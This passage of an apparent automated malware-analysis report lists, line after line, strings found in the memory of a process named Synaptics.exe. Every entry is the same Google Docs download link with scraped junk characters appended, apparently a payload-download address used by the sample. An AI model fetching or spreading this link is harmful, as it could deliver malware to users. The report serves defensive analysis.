                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleX
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleco:8O
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleme
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleni
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleni5
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniy
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadll
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllP
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllX
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlld
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllem
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllem6
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlleme
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlll
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadls
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlu
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlunaL
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlvin
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlving
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmQ
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadma
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme$
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme8
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmeD
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmeH
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmeL
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmo
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmput#
                                Source: Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.00000000073C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn-
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn-o
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.w
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn0
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn0Y
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn1XQ
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnSK
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadna
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnaD
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnaP
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnc
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncD
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncT
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncV
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnca
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncell
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncis
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncl
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne.cnj9
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne4
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadned
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnep
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnet
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetle
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnex
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadng
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadni
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadni8
                                Source: Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadni;
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnil
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnmA
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnn
                                Source: Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnonce
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnt
                                Source: Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnt-Le
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnt9Vy
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadntp
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadny
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadny$8
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado9z-t=
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado:
                                Source: Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoW64
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogK
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadol
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadolvin
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3070010239.000000003B051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
